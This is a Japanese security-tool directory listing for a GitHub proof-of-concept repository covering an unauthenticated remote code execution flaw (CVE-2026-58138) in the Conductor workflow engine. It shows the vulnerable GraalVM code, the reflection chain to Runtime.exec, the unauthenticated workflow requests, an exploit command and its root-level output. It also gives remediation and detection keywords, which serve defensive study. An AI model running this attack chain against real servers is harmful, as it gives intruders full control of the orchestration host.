Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-58138-Conductor-Unauth-RCE — CVE-2026-58138 — Conductor (3.21.21..<3.30.2) 認証不要のRCE、INLINE GraalVM evaluator(HostAccess.ALL)経由。ラボ + PoC、エンドツーエンドで検証済み(root)。 | Kitploit
ツール/GitHubGitHub/biitts/cve-2026-58138-conductor-unauth-rce
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育ペイロード開発ラボと実践
GitHubbiitts/cve-2026-58138-conductor-unauth-rce

CVE-2026-58138-Conductor-Unauth-RCE

CVE-2026-58138 — Conductor (3.21.21..<3.30.2) 認証不要のRCE、INLINE GraalVM evaluator(HostAccess.ALL)経由。ラボ + PoC、エンドツーエンドで検証済み(root)。

リポジトリを見る
32ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-58138 — Conductor の未認証 RCE(INLINE GraalVM 評価機能経由)

Conductor (OSS / Orkes) 3.21.21 … before 3.30.2 は、GraalVM コンテキスト(完全なホストアクセス(HostAccess.ALL)で構築)を使用して、INLINE(および LAMBDA / DO_WHILE / SWITCH)タスク内のユーザー提供の JavaScript を評価します。スクリプトは java.lang.Runtime までリフレクションし、OS コマンドを実行します。コミュニティ API はデフォルトで認証がないため、このようなタスクを含むワークフローを送信すると、未認証のリモートコード実行となります。

CVECVE-2026-58138
アドバイザリvulncheck — Orkes Conductor の未認証 RCE(GraalVM スクリプト評価機能経由)
影響を受けるバージョンConductor 3.21.21 … before 3.30.2
修正バージョン3.30.2 (commits 87a7d96, c691e35)
クラスCWE-94 (Code Injection) — GraalVM polyglot sandbox not enforced
CVSS9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
認証なし(コミュニティ API はデフォルトで認証なし)
ステータス確認済み — conductoross/conductor:3.22.3 で root として再現

バージョンに関する注意(お読みください)。 影響範囲内で評価機能の設定は異なります: ~3.29.x までのバージョン(このラボでは 3.22.3 を使用)は、プレーンな allowHostAccess(HostAccess.ALL) でコンテキストを構築します — これは CVE が説明しているサンドボックスなしの設定であり、この PoC が直接悪用するものです。 3.30.0/3.30.1 ラインでは 部分的な denyAccess(...) ブロックリスト(リフレクションをブロック)が追加されました;完全な修正(allowHostClassLoading(false) + エンジンの強化)は 3.30.2 でのみ適用されます。この PoC はプレーンな HostAccess.ALL 設定を対象としており、3.30.1 のブロックリストをバイパスするとは 主張しません。


根本原因

core/.../events/ScriptEvaluator.java (≤ 3.29.x / 3.22.3):

root@kitploit:~
return Context.newBuilder("js")
        .allowHostAccess(HostAccess.ALL)   // full host interop -> no sandbox
        .build();

HostAccess.ALL により、スクリプトは Java ホストオブジェクトの任意のメソッド/フィールドを呼び出せます。INLINE タスクは入力を $(実際の Java オブジェクト)としてバインドするため、スクリプトは次のようにピボットできます: $.getClass().getClass() → java.lang.Class → Class.forName("java.lang.Runtime") → Runtime.getRuntime().exec(...)。Python 評価機能も同等です(Context.newBuilder("python").allowAllAccess(true))。

悪用

  1. 悪意のある expression を含む INLINE タスクを持つワークフローを登録します(POST /api/metadata/workflow、認証なし)。
  2. 開始します(POST /api/workflow/{name}、認証なし)。
  3. INLINE タスクが JS を評価し、リフレクティブな Runtime.exec がコマンドを実行し、PoC はその stdout をタスク結果として返します。

再現

root@kitploit:~
docker compose -f lab/docker-compose.yml up -d        # conductoross/conductor:3.22.3 (in range)
# wait ~60s for the all-in-one server to boot

python3 exploit.py http://127.0.0.1:8080 -c "id; hostname"

観測結果:

root@kitploit:~
[*] registering workflow with a malicious INLINE (javascript) task ... (no auth)
[*] started workflow id=...; reading INLINE task output ...
[+] UNAUTHENTICATED RCE CONFIRMED - command output from the Conductor host:
uid=0(root) gid=0(root) groups=0(root)
vbox
Linux 6.18.12+kali-amd64

uid=0(root) は Conductor プロセスのユーザーです;出力はライブの id/uname 状態 — 実際の実行であり、エコーではありません。exploit.py は Python 標準ライブラリのみを使用しています。

影響

Conductor API にアクセスできる者は誰でも、オーケストレーターホスト上で任意の OS コマンド(ここでは root として)を実行できます — ワークフローエンジン、その永続化/キュー、およびそのワークフローと保存された認証情報が触れるすべてのシステムが完全に侵害されます。

修復

  • Conductor ≥ 3.30.2 にアップグレードする(JS/Python 評価機能はホストアクセス/クラスローディングが有効な状態では実行されなくなります)。
  • 多層防御:Conductor API の前に認証を配置し、サーバーを非 root の最小権限ユーザーとして実行し、ワークフローの登録/実行を制限します。

検出

INLINE/LAMBDA/DO_WHILE/SWITCH タスクに getClass、forName、Runtime、exec、ProcessBuilder、または java. リフレクションを参照する expression 文字列が含まれているワークフロー定義、およびシェルを起動する Conductor プロセスをフラグします。

リフレクションチェーン、バージョン間の評価機能設定、パッチについては ANALYSIS.md を参照してください。


  • 著者: Caio Fabrício — github.com/BiiTts
  • 脆弱性のクレジットは元の報告者/ベンダーアドバイザリに帰属します;このリポジトリは防御的および教育的な使用のための独立した再現可能なラボ+PoCです。許可されたセキュリティテスト専用。
ツールをダウンロード